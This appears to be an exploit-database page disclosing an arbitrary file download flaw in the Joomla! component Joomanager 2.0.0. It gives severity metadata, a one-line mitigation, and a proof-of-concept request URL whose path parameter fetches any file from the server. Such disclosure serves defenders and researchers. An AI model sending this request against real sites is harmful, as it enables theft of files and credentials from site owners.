header-logo
Suggest Exploit
vendor:
Joomanager
by:
Ihsan Sencan
8,8
CVSS
HIGH
Arbitrary File Download
434
CWE
Product Name: Joomanager
Affected Version From: 2.0.0
Affected Version To: 2.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:joomanager:joomanager:2.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017

Joomla! Component Joomanager 2.0.0 – Arbitrary File Download

The security obligation allows an attacker to arbitrary download files.

Mitigation:

Ensure that the application is not vulnerable to arbitrary file download attacks by validating the file path and name before allowing the download.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
# Dork: N/A
# Date: 30.08.2017
# Vendor Homepage: http://www.joomanager.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/
# Demo: http://www.joomanager.com/demo/realestate
# Version: 2.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The security obligation allows an attacker to arbitrary download files..
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE]
# 
# Etc..
# # # # #